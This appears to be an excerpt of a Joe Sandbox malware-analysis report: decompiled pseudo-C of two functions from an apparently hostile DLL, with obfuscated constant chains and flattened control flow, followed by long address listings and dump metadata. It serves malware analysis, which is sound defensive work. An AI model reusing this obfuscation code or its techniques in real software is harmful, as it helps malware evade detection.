				intOrPtr _t458;
				void* _t460;
				void* _t508;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				intOrPtr* _t534;
				void* _t537;
				void* _t538;

				_t458 = _a24;
				_push(_t458);
				_push(_a20);
				_t534 = __ecx;
				_push(_a16);
				_v156 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t400);
				_v152 = 0x1ee029;
				_t538 = _t537 + 0x20;
				_t460 = 0xf0aa094;
				_t519 = 0x59;
				_v152 = _v152 * 0x53;
				_v152 = _v152 ^ 0x0a02ad5b;
				_v120 = 0x2e5311;
				_v120 = _v120 ^ 0xe660d2f8;
				_v120 = _v120 ^ 0xe649fc28;
				_v80 = 0x91358;
				_v80 = _v80 * 0x29;
				_v80 = _v80 | 0x1917a6d7;
				_v80 = _v80 ^ 0x197ed78c;
				_v96 = 0x864d8a;
				_v96 = _v96 * 0x68;
				_v96 = _v96 / _t519;
				_v96 = _v96 ^ 0x00977d81;
				_v104 = 0x73430f;
				_t520 = 0x22;
				_v104 = _v104 / _t520;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x01b21e30;
				_v128 = 0x2ef155;
				_t521 = 0xc;
				_v128 = _v128 / _t521;
				_v128 = _v128 ^ 0x0005732d;
				_v12 = 0x61311f;
				_t522 = 0x51;
				_v12 = _v12 / _t522;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x00018224;
				_v112 = 0x2a9ecd;
				_v112 = _v112 << 8;
				_v112 = _v112 + 0x4b18;
				_v112 = _v112 ^ 0x2a91adfb;
				_v44 = 0x8c67a3;
				_v44 = _v44 + 0xbf2c;
				_t523 = 0x1a;
				_v44 = _v44 / _t523;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x56d2d87d;
				_v20 = 0xb2272e;
				_t524 = 0x6b;
				_v20 = _v20 / _t524;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xffffd823;
				_v20 = _v20 ^ 0x003105de;
				_v144 = 0x2b3b33;
				_t525 = 0x2b;
				_v144 = _v144 * 0x23;
				_v144 = _v144 ^ 0x05e29440;
				_v52 = 0xfb7274;
				_v52 = _v52 + 0xffff2a15;
				_v52 = _v52 + 0xffff332b;
				_v52 = _v52 >> 9;
				_v52 = _v52 ^ 0x000fdf14;
				_v88 = 0xc646f0;
				_v88 = _v88 >> 1;
				_v88 = _v88 + 0xffff0542;
				_v88 = _v88 ^ 0x0060230d;
				_v136 = 0x21355;
				_v136 = _v136 + 0x6ddd;
				_v136 = _v136 ^ 0x000c09c4;
				_v148 = 0xba736e;
				_v148 = _v148 + 0xffff584e;
				_v148 = _v148 ^ 0x00bc780c;
				_v72 = 0xf06361;
				_v72 = _v72 >> 4;
				_v72 = _v72 ^ 0xd5eeb61d;
				_v72 = _v72 ^ 0xd5e3ba03;
				_v68 = 0x39c1e1;
				_v68 = _v68 / _t525;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x157dcab9;
				_v28 = 0x7b1c58;
				_v28 = _v28 + 0x44f9;
				_v28 = _v28 + 0xe0d1;
				_v28 = _v28 | 0x2c17f99e;
				_v28 = _v28 ^ 0x2c795b23;
				_v8 = 0x6811e0;
				_t526 = 0x7d;
				_v8 = _v8 / _t526;
				_t527 = 0x6c;
				_v8 = _v8 / _t527;
				_t528 = 6;
				_v8 = _v8 / _t528;
				_v8 = _v8 ^ 0x00012ce9;
				_v84 = 0x1c9c1b;
				_v84 = _v84 ^ 0x05ddd281;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x002853b0;
				_v76 = 0xb1555b;
				_v76 = _v76 << 7;
				_v76 = _v76 * 0x47;
				_v76 = _v76 ^ 0x9758833c;
				_v36 = 0x114b6d;
				_v36 = _v36 ^ 0x431dffba;
				_v36 = _v36 >> 3;
				_v36 = _v36 + 0x181d;
				_v36 = _v36 ^ 0x086a5704;
				_v60 = 0xa17b63;
				_v60 = _v60 ^ 0x190e6497;
				_v60 = _v60 ^ 0xa9f7cd41;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0xb1a3277b;
				_v24 = 0xc713d;
				_v24 = _v24 + 0xc399;
				_v24 = _v24 << 4;
				_v24 = _v24 + 0xfffffd24;
				_v24 = _v24 ^ 0x00d339a4;
				_v16 = 0xef5337;
				_t529 = 0x2b;
				_v16 = _v16 / _t529;
				_v16 = _v16 | 0x2bad32d2;
				_v16 = _v16 + 0xfffffea2;
				_v16 = _v16 ^ 0x2bafb8a8;
				_v100 = 0x51ad29;
				_v100 = _v100 << 0xd;
				_v100 = _v100 ^ 0x8b9fc663;
				_v100 = _v100 ^ 0xbe3a4459;
				_v92 = 0x2bdd9f;
				_t530 = 0x14;
				_v92 = _v92 / _t530;
				_v92 = _v92 + 0xffff92be;
				_v92 = _v92 ^ 0x000ebd35;
				_v140 = 0x9e48cc;
				_v140 = _v140 << 0xd;
				_v140 = _v140 ^ 0xc915160c;
				_v108 = 0xd84d8a;
				_v108 = _v108 >> 0x10;
				_v108 = _v108 >> 0xf;
				_v108 = _v108 ^ 0x0004338e;
				_v40 = 0xc226eb;
				_v40 = _v40 << 2;
				_v40 = _v40 + 0xfffff267;
				_v40 = _v40 << 0x10;
				_v40 = _v40 ^ 0x8e1c4dbd;
				_v32 = 0xa8fcf7;
				_v32 = _v32 * 0x2f;
				_v32 = _v32 / _t530;
				_t531 = 0x59;
				_v32 = _v32 * 0x62;
				_v32 = _v32 ^ 0x9808cd5a;
				_v56 = 0xfa54e1;
				_v56 = _v56 + 0xffff7ead;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t531;
				_v56 = _v56 ^ 0x00b2c623;
				_v132 = 0x7ed953;
				_v132 = _v132 ^ 0x188046ff;
				_v132 = _v132 ^ 0x18f64c45;
				_v124 = 0x5f3094;
				_v124 = _v124 ^ 0xdd2f4899;
				_v124 = _v124 ^ 0xdd733dae;
				_v48 = 0x3fdd04;
				_v48 = _v48 + 0xdca9;
				_v48 = _v48 ^ 0x51a2bdec;
				_v48 = _v48 + 0xffffe9fd;
				_v48 = _v48 ^ 0x51eeddfc;
				_v116 = 0x86a662;
				_t532 = 0x3e;
				_t533 = _v156;
				_v116 = _v116 / _t532;
				_v116 = _v116 * 0x73;
				_v116 = _v116 ^ 0x00fd398d;
				_v64 = 0x72f53e;
				_v64 = _v64 + 0x31db;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0xffff6dcd;
				_v64 = _v64 ^ 0x0003149a;
				while(1) {
					_t508 = 0x2e;
					L2:
					while(_t460 != 0x9b6cb5) {
						if(_t460 == 0x44804ea) {
							__eflags = _v820 & _v152;
							if(__eflags == 0) {
								_t445 =  *_t534( &_v820,  &_v228);
								asm("sbb ecx, ecx");
								_t460 = ( ~_t445 & 0xfb5d1634) + 0x53e5681;
								while(1) {
									_t508 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v776 - _t508;
							if(_v776 != _t508) {
								L18:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v28);
									_push(_v68);
									_push(_v72);
									E02B02D0A(_v84, __eflags,  &_v776, _v76, _v36, _v60, E02AE16DC,  &_v1860, _t458, E02AFE1F8(E02AE16DC, _v148, __eflags));
									E02AF437A(_v156, _v24, _v16, _v100, _v92, _a16, _a20,  &_v1860);
									_t447 = E02AFFECB(_t452, _v140, _v108, _v40, _v32);
									_t534 = _v156;
									_t538 = _t538 + 0x50;
									_t508 = 0x2e;
								}
								L17:
								_t460 = 0x9b6cb5;
								continue;
							}
							__eflags = _v774;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v774 - _t508;
							if(_v774 != _t508) {
								goto L18;
							}
							__eflags = _v772;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t460 == 0x481089e) {
							_t447 = E02AF2DA7( &_v820, _v88, _v136,  &_v1340);
							_t533 = _t447;
							__eflags = _t447 - 0xffffffff;
							if(__eflags == 0) {
								return _t447;
							}
							_t460 = 0x44804ea;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 == 0x53e5681) {
							return E02AEBEA1(_v116, _v64, _t533);
						}
						if(_t460 == 0xeb5715f) {
							_push(_v104);
							_push(_v96);
							_push(_v80);
							E02AF2C9C(_v12, __eflags, E02AFE1F8(0x2ae167c, _v120, __eflags),  &_v1340, 0x2ae167c, _v112, _t458);
							_t447 = E02AFFECB(_t449, _v44, _v20, _v144, _v52);
							_t534 = _v156;
							_t538 = _t538 + 0x2c;
							_t460 = 0x481089e;
							while(1) {
								_t508 = 0x2e;
								goto L2;
							}
						}
						if(_t460 != 0xf0aa094) {
							L24:
							__eflags = _t460 - 0x41075ad;
							if(__eflags != 0) {
								continue;
							}
							return _t447;
						}
						_v168 = _t458;
						_t460 = 0xeb5715f;
					}
					_t441 = E02B00F1E(_v56, _v132,  &_v820, _v124, _v48, _t533);
					_t538 = _t538 + 0x10;
					__eflags = _t441;
					if(__eflags != 0) {
						_t460 = 0x44804ea;
						_t508 = 0x2e;
						goto L24;
					}
					_t460 = 0x53e5681;
				}
			}









































































                                                                                                          0x02af4384
                                                                                                          0x02af4389
                                                                                                          0x02af438a
                                                                                                          0x02af438d
                                                                                                          0x02af438f
                                                                                                          0x02af4392
                                                                                                          0x02af4398
                                                                                                          0x02af439b
                                                                                                          0x02af439e
                                                                                                          0x02af43a1
                                                                                                          0x02af43a2
                                                                                                          0x02af43a3
                                                                                                          0x02af43a8
                                                                                                          0x02af43b2
                                                                                                          0x02af43be
                                                                                                          0x02af43c5
                                                                                                          0x02af43c6
                                                                                                          0x02af43cc
                                                                                                          0x02af43d6
                                                                                                          0x02af43dd
                                                                                                          0x02af43e4
                                                                                                          0x02af43eb
                                                                                                          0x02af43f8
                                                                                                          0x02af43fb
                                                                                                          0x02af4402
                                                                                                          0x02af4409
                                                                                                          0x02af4414
                                                                                                          0x02af441e
                                                                                                          0x02af4421
                                                                                                          0x02af4428
                                                                                                          0x02af4432
                                                                                                          0x02af4437
                                                                                                          0x02af443c
                                                                                                          0x02af4440
                                                                                                          0x02af4447
                                                                                                          0x02af4451
                                                                                                          0x02af4456
                                                                                                          0x02af445b
                                                                                                          0x02af4462
                                                                                                          0x02af446c
                                                                                                          0x02af4471
                                                                                                          0x02af4476
                                                                                                          0x02af447a
                                                                                                          0x02af447e
                                                                                                          0x02af4485
                                                                                                          0x02af448c
                                                                                                          0x02af4490
                                                                                                          0x02af4497
                                                                                                          0x02af449e
                                                                                                          0x02af44a5
                                                                                                          0x02af44af
                                                                                                          0x02af44b2
                                                                                                          0x02af44b5
                                                                                                          0x02af44b9
                                                                                                          0x02af44c0
                                                                                                          0x02af44ce
                                                                                                          0x02af44d3
                                                                                                          0x02af44d8
                                                                                                          0x02af44dc
                                                                                                          0x02af44e3
                                                                                                          0x02af44ea
                                                                                                          0x02af44fb
                                                                                                          0x02af44fe
                                                                                                          0x02af4504
                                                                                                          0x02af450e
                                                                                                          0x02af4515
                                                                                                          0x02af451c
                                                                                                          0x02af4523
                                                                                                          0x02af4527
                                                                                                          0x02af452e
                                                                                                          0x02af4535
                                                                                                          0x02af4538
                                                                                                          0x02af453f
                                                                                                          0x02af4546
                                                                                                          0x02af4550
                                                                                                          0x02af455a
                                                                                                          0x02af4564
                                                                                                          0x02af456e
                                                                                                          0x02af4578
                                                                                                          0x02af4582
                                                                                                          0x02af4589
                                                                                                          0x02af458d
                                                                                                          0x02af4594
                                                                                                          0x02af459b
                                                                                                          0x02af45a9
                                                                                                          0x02af45ac
                                                                                                          0x02af45b0
                                                                                                          0x02af45b7
                                                                                                          0x02af45be
                                                                                                          0x02af45c5
                                                                                                          0x02af45cc
                                                                                                          0x02af45d3
                                                                                                          0x02af45da
                                                                                                          0x02af45e4
                                                                                                          0x02af45e9
                                                                                                          0x02af45f1
                                                                                                          0x02af45f6
                                                                                                          0x02af45fe
                                                                                                          0x02af4601
                                                                                                          0x02af4604
                                                                                                          0x02af460b
                                                                                                          0x02af4612
                                                                                                          0x02af4619
                                                                                                          0x02af461d
                                                                                                          0x02af4624
                                                                                                          0x02af462b
                                                                                                          0x02af4633
                                                                                                          0x02af4636
                                                                                                          0x02af463d
                                                                                                          0x02af4644
                                                                                                          0x02af464b
                                                                                                          0x02af464f
                                                                                                          0x02af4656
                                                                                                          0x02af465d
                                                                                                          0x02af4664
                                                                                                          0x02af466d
                                                                                                          0x02af4674
                                                                                                          0x02af4678
                                                                                                          0x02af467f
                                                                                                          0x02af4686
                                                                                                          0x02af468d
                                                                                                          0x02af4691
                                                                                                          0x02af4698
                                                                                                          0x02af469f
                                                                                                          0x02af46ab
                                                                                                          0x02af46b0
                                                                                                          0x02af46b3
                                                                                                          0x02af46ba
                                                                                                          0x02af46c1
                                                                                                          0x02af46c8
                                                                                                          0x02af46cf
                                                                                                          0x02af46d3
                                                                                                          0x02af46da
                                                                                                          0x02af46e1
                                                                                                          0x02af46ed
                                                                                                          0x02af46f2
                                                                                                          0x02af46f5
                                                                                                          0x02af46fc
                                                                                                          0x02af4703
                                                                                                          0x02af470d
                                                                                                          0x02af4714
                                                                                                          0x02af471e
                                                                                                          0x02af4725
                                                                                                          0x02af4729
                                                                                                          0x02af472d
                                                                                                          0x02af4734
                                                                                                          0x02af473b
                                                                                                          0x02af473f
                                                                                                          0x02af4746
                                                                                                          0x02af474a
                                                                                                          0x02af4751
                                                                                                          0x02af475e
                                                                                                          0x02af4768
                                                                                                          0x02af476f
                                                                                                          0x02af4772
                                                                                                          0x02af4775
                                                                                                          0x02af477c
                                                                                                          0x02af4783
                                                                                                          0x02af478a
                                                                                                          0x02af4795
                                                                                                          0x02af4798
                                                                                                          0x02af479f
                                                                                                          0x02af47a6
                                                                                                          0x02af47ad
                                                                                                          0x02af47b4
                                                                                                          0x02af47bb
                                                                                                          0x02af47c2
                                                                                                          0x02af47c9
                                                                                                          0x02af47d0
                                                                                                          0x02af47d7
                                                                                                          0x02af47de
                                                                                                          0x02af47e5
                                                                                                          0x02af47ec
                                                                                                          0x02af47f6
                                                                                                          0x02af47f9
                                                                                                          0x02af47ff
                                                                                                          0x02af4806
                                                                                                          0x02af4809
                                                                                                          0x02af4810
                                                                                                          0x02af4817
                                                                                                          0x02af481e
                                                                                                          0x02af4822
                                                                                                          0x02af4829
                                                                                                          0x02af4830
                                                                                                          0x02af4832
                                                                                                          0x00000000
                                                                                                          0x02af4833
                                                                                                          0x02af4845
                                                                                                          0x02af491b
                                                                                                          0x02af4921
                                                                                                          0x02af49f9
                                                                                                          0x02af49ff
                                                                                                          0x02af4a07
                                                                                                          0x02af4830
                                                                                                          0x02af4832
                                                                                                          0x00000000
                                                                                                          0x02af4832
                                                                                                          0x02af4830
                                                                                                          0x02af4927
                                                                                                          0x02af492e
                                                                                                          0x02af4957
                                                                                                          0x02af4957
                                                                                                          0x02af495b
                                                                                                          0x02af495d
                                                                                                          0x02af4965
                                                                                                          0x02af4968
                                                                                                          0x02af499b
                                                                                                          0x02af49bf
                                                                                                          0x02af49d5
                                                                                                          0x02af49da
                                                                                                          0x02af49e0
                                                                                                          0x02af49e5
                                                                                                          0x02af49e5
                                                                                                          0x02af494d
                                                                                                          0x02af494d
                                                                                                          0x00000000
                                                                                                          0x02af494d
                                                                                                          0x02af4930
                                                                                                          0x02af4938
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af493a
                                                                                                          0x02af4941
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4943
                                                                                                          0x02af494b
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af494b
                                                                                                          0x02af4851
                                                                                                          0x02af48f9
                                                                                                          0x02af48fe
                                                                                                          0x02af4902
                                                                                                          0x02af4905
                                                                                                          0x02af4a65
                                                                                                          0x02af4a65
                                                                                                          0x02af490b
                                                                                                          0x02af4830
                                                                                                          0x02af4832
                                                                                                          0x00000000
                                                                                                          0x02af4832
                                                                                                          0x02af4830
                                                                                                          0x02af485d
                                                                                                          0x00000000
                                                                                                          0x02af4a5e
                                                                                                          0x02af4869
                                                                                                          0x02af4884
                                                                                                          0x02af488c
                                                                                                          0x02af488f
                                                                                                          0x02af48b2
                                                                                                          0x02af48cb
                                                                                                          0x02af48d0
                                                                                                          0x02af48d6
                                                                                                          0x02af48d9
                                                                                                          0x02af4830
                                                                                                          0x02af4832
                                                                                                          0x00000000
                                                                                                          0x02af4832
                                                                                                          0x02af4830
                                                                                                          0x02af4871
                                                                                                          0x02af4a44
                                                                                                          0x02af4a44
                                                                                                          0x02af4a4a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af4a4a
                                                                                                          0x02af4877
                                                                                                          0x02af487d
                                                                                                          0x02af487d
                                                                                                          0x02af4a26
                                                                                                          0x02af4a2b
                                                                                                          0x02af4a2e
                                                                                                          0x02af4a30
                                                                                                          0x02af4a3e
                                                                                                          0x02af4a43
                                                                                                          0x00000000
                                                                                                          0x02af4a43
                                                                                                          0x02af4a32
                                                                                                          0x02af4a32

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: #`$#[y,$3;+$7S
                                                                                                          • API String ID: 0-3740457175
                                                                                                          • Opcode ID: bea796105010068af1dfc4c99d478b2ee5d826ee0d4b7597e01cce04f05d6d57
                                                                                                          • Instruction ID: 4f5d5c43005a81e2291448c36818b1274f79e5cab49e6dce4d8620d0cc2a24c1
                                                                                                          • Opcode Fuzzy Hash: bea796105010068af1dfc4c99d478b2ee5d826ee0d4b7597e01cce04f05d6d57
                                                                                                          • Instruction Fuzzy Hash: 9D124671D00218DBDF68DFE5C989ADEBBB2FB44314F208159E619BB260D7B44A96CF40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B000EF, Relevance: 5.3, Strings: 4, Instructions: 274COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02B000EF(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				unsigned int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _t303;
				void* _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t370;
				signed int* _t373;

				_t373 =  &_v1692;
				_v1576 = 0xe8da59;
				asm("stosd");
				_t316 = __ecx;
				_t318 = 0x5a;
				asm("stosd");
				_t370 = 0x219adc7;
				asm("stosd");
				_v1592 = 0x4cba20;
				_v1592 = _v1592 / _t318;
				_v1592 = _v1592 ^ 0x000e53d2;
				_v1660 = 0x37da44;
				_v1660 = _v1660 | 0x897b84ec;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x011e0d16;
				_v1628 = 0x1c89a1;
				_v1628 = _v1628 | 0x8af6c41c;
				_v1628 = _v1628 ^ 0x8af282b8;
				_v1684 = 0xdb2dca;
				_v1684 = _v1684 | 0x5a04171c;
				_t319 = 0xb;
				_v1684 = _v1684 * 0x1a;
				_v1684 = _v1684 >> 0xb;
				_v1684 = _v1684 ^ 0x000c87cc;
				_v1676 = 0x832ed6;
				_v1676 = _v1676 / _t319;
				_t320 = 5;
				_v1676 = _v1676 / _t320;
				_v1676 = _v1676 ^ 0xed35e4ac;
				_v1676 = _v1676 ^ 0xed379c5b;
				_v1616 = 0xcbfb93;
				_v1616 = _v1616 >> 7;
				_v1616 = _v1616 ^ 0x000d5997;
				_v1688 = 0xe655f9;
				_v1688 = _v1688 + 0xffff9882;
				_t321 = 0x2b;
				_v1688 = _v1688 * 0xb;
				_v1688 = _v1688 * 0x5b;
				_v1688 = _v1688 ^ 0x83159ef1;
				_v1692 = 0xaa6b82;
				_v1692 = _v1692 | 0xcfd3fae0;
				_v1692 = _v1692 / _t321;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x4e1b8b3c;
				_v1644 = 0x70af24;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 | 0xf364d4b3;
				_v1644 = _v1644 ^ 0xff7a96be;
				_v1668 = 0x4a582b;
				_v1668 = _v1668 * 0x66;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0x909bc222;
				_v1636 = 0x31215f;
				_v1636 = _v1636 ^ 0x6923b039;
				_t322 = 0x29;
				_v1636 = _v1636 / _t322;
				_v1636 = _v1636 ^ 0x029cf3aa;
				_v1652 = 0x9b2524;
				_t323 = 0x38;
				_v1652 = _v1652 / _t323;
				_v1652 = _v1652 ^ 0x48c3dfd8;
				_v1652 = _v1652 ^ 0x48c1ce16;
				_v1608 = 0x82759;
				_v1608 = _v1608 >> 9;
				_v1608 = _v1608 ^ 0x000ff1e7;
				_v1580 = 0x9cb9ac;
				_v1580 = _v1580 + 0xffffe541;
				_v1580 = _v1580 ^ 0x0099fe2e;
				_v1648 = 0xf0b12f;
				_v1648 = _v1648 >> 3;
				_v1648 = _v1648 >> 0xc;
				_v1648 = _v1648 ^ 0x000b1180;
				_v1680 = 0x5a67b4;
				_t324 = 0x1f;
				_v1680 = _v1680 / _t324;
				_t325 = 0x30;
				_v1680 = _v1680 * 0x62;
				_v1680 = _v1680 / _t325;
				_v1680 = _v1680 ^ 0x000c0a94;
				_v1656 = 0x7af90a;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 ^ 0xd48e11dc;
				_v1656 = _v1656 ^ 0xd48f85db;
				_v1664 = 0xc7c49c;
				_v1664 = _v1664 ^ 0x0b3147da;
				_v1664 = _v1664 ^ 0x91b20725;
				_v1664 = _v1664 ^ 0x9a45c1a7;
				_v1584 = 0x3444f6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x00d71217;
				_v1624 = 0x130de1;
				_t326 = 0x58;
				_v1624 = _v1624 / _t326;
				_v1624 = _v1624 ^ 0x000fc6c7;
				_v1588 = 0xc870d9;
				_v1588 = _v1588 >> 7;
				_v1588 = _v1588 ^ 0x00060dd4;
				_v1600 = 0xa62b50;
				_v1600 = _v1600 | 0x0b3ea590;
				_v1600 = _v1600 ^ 0x0bb32963;
				_v1640 = 0x5829fa;
				_v1640 = _v1640 >> 0x10;
				_v1640 = _v1640 * 7;
				_v1640 = _v1640 ^ 0x000c8c8e;
				_v1620 = 0x9954e5;
				_v1620 = _v1620 | 0x46050794;
				_v1620 = _v1620 ^ 0x46999c00;
				_v1672 = 0x8b6b4f;
				_v1672 = _v1672 ^ 0x051743d3;
				_v1672 = _v1672 + 0x5fbf;
				_v1672 = _v1672 * 0x44;
				_v1672 = _v1672 ^ 0x7d983568;
				_v1596 = 0x4b105f;
				_v1596 = _v1596 ^ 0x074c3e20;
				_v1596 = _v1596 ^ 0x0709a291;
				_v1632 = 0x867cf1;
				_v1632 = _v1632 + 0x5758;
				_v1632 = _v1632 << 0xb;
				_v1632 = _v1632 ^ 0x36a3bfa7;
				_v1604 = 0x1e01e;
				_t327 = 0x6d;
				_v1604 = _v1604 / _t327;
				_v1604 = _v1604 ^ 0x000451f9;
				_v1612 = 0x51328f;
				_t328 = 0x66;
				_t303 = _v1612 / _t328;
				_v1612 = _t303;
				_v1612 = _v1612 ^ 0x000ccfe8;
				while(_t370 != 0x219adc7) {
					if(_t370 == 0x472b880) {
						_push(_t328);
						__eflags = 0;
						return E02AF85FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
					}
					_t379 = _t370 - 0x6430241;
					if(_t370 != 0x6430241) {
						L7:
						__eflags = _t370 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t303;
						}
						L10:
						return _t303;
					}
					E02B00DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
					 *((short*)(E02AF09DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
					E02AEBAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
					_push(_v1580);
					_push(_v1608);
					_push(_v1652);
					E02B02D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x2ae18bc,  &_v1560,  &_v1040, E02AFE1F8(0x2ae18bc, _v1636, _t379));
					E02AFFECB(_t310, _v1624, _v1588, _v1600, _v1640);
					_t328 = _v1620;
					_t303 = E02AEBFBE( &_v1560, _t316, _v1672);
					_t373 =  &(_t373[0x18]);
					if(_t303 != 0) {
						_t370 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t370 = 0x6430241;
				goto L7;
			}




















































                                                                                                          0x02b000ef
                                                                                                          0x02b000f5
                                                                                                          0x02b0010c
                                                                                                          0x02b0010d
                                                                                                          0x02b00111
                                                                                                          0x02b00114
                                                                                                          0x02b00115
                                                                                                          0x02b0011a
                                                                                                          0x02b0011b
                                                                                                          0x02b0012b
                                                                                                          0x02b0012f
                                                                                                          0x02b00137
                                                                                                          0x02b0013f
                                                                                                          0x02b00147
                                                                                                          0x02b0014c
                                                                                                          0x02b00154
                                                                                                          0x02b0015c
                                                                                                          0x02b00164
                                                                                                          0x02b0016c
                                                                                                          0x02b00174
                                                                                                          0x02b00181
                                                                                                          0x02b00184
                                                                                                          0x02b00188
                                                                                                          0x02b0018d
                                                                                                          0x02b00195
                                                                                                          0x02b001a5
                                                                                                          0x02b001ad
                                                                                                          0x02b001b2
                                                                                                          0x02b001b8
                                                                                                          0x02b001c0
                                                                                                          0x02b001c8
                                                                                                          0x02b001d0
                                                                                                          0x02b001d5
                                                                                                          0x02b001dd
                                                                                                          0x02b001e5
                                                                                                          0x02b001f2
                                                                                                          0x02b001f3
                                                                                                          0x02b001fc
                                                                                                          0x02b00200
                                                                                                          0x02b00208
                                                                                                          0x02b00210
                                                                                                          0x02b0021e
                                                                                                          0x02b00227
                                                                                                          0x02b0022b
                                                                                                          0x02b00233
                                                                                                          0x02b0023b
                                                                                                          0x02b00240
                                                                                                          0x02b00248
                                                                                                          0x02b00250
                                                                                                          0x02b0025d
                                                                                                          0x02b00261
                                                                                                          0x02b00266
                                                                                                          0x02b0026e
                                                                                                          0x02b00276
                                                                                                          0x02b00286
                                                                                                          0x02b0028b
                                                                                                          0x02b00291
                                                                                                          0x02b00299
                                                                                                          0x02b002a5
                                                                                                          0x02b002aa
                                                                                                          0x02b002b0
                                                                                                          0x02b002b8
                                                                                                          0x02b002c0
                                                                                                          0x02b002c8
                                                                                                          0x02b002cd
                                                                                                          0x02b002d5
                                                                                                          0x02b002e0
                                                                                                          0x02b002eb
                                                                                                          0x02b002f6
                                                                                                          0x02b002fe
                                                                                                          0x02b00303
                                                                                                          0x02b00308
                                                                                                          0x02b00310
                                                                                                          0x02b0031c
                                                                                                          0x02b00321
                                                                                                          0x02b0032c
                                                                                                          0x02b0032f
                                                                                                          0x02b0033b
                                                                                                          0x02b0033f
                                                                                                          0x02b00347
                                                                                                          0x02b0034f
                                                                                                          0x02b00354
                                                                                                          0x02b0035c
                                                                                                          0x02b00364
                                                                                                          0x02b0036c
                                                                                                          0x02b00374
                                                                                                          0x02b0037c
                                                                                                          0x02b00384
                                                                                                          0x02b0038f
                                                                                                          0x02b00397
                                                                                                          0x02b003a2
                                                                                                          0x02b003ae
                                                                                                          0x02b003b1
                                                                                                          0x02b003b5
                                                                                                          0x02b003bd
                                                                                                          0x02b003c5
                                                                                                          0x02b003ca
                                                                                                          0x02b003d2
                                                                                                          0x02b003da
                                                                                                          0x02b003e2
                                                                                                          0x02b003ea
                                                                                                          0x02b003f2
                                                                                                          0x02b003fc
                                                                                                          0x02b00400
                                                                                                          0x02b00408
                                                                                                          0x02b00410
                                                                                                          0x02b00418
                                                                                                          0x02b00420
                                                                                                          0x02b00428
                                                                                                          0x02b00430
                                                                                                          0x02b0043d
                                                                                                          0x02b00441
                                                                                                          0x02b00449
                                                                                                          0x02b00451
                                                                                                          0x02b0045b
                                                                                                          0x02b00468
                                                                                                          0x02b00475
                                                                                                          0x02b0047d
                                                                                                          0x02b00482
                                                                                                          0x02b0048a
                                                                                                          0x02b00498
                                                                                                          0x02b0049d
                                                                                                          0x02b004a3
                                                                                                          0x02b004ab
                                                                                                          0x02b004b7
                                                                                                          0x02b004b8
                                                                                                          0x02b004ba
                                                                                                          0x02b004be
                                                                                                          0x02b004c6
                                                                                                          0x02b004d4
                                                                                                          0x02b005e9
                                                                                                          0x02b005ee
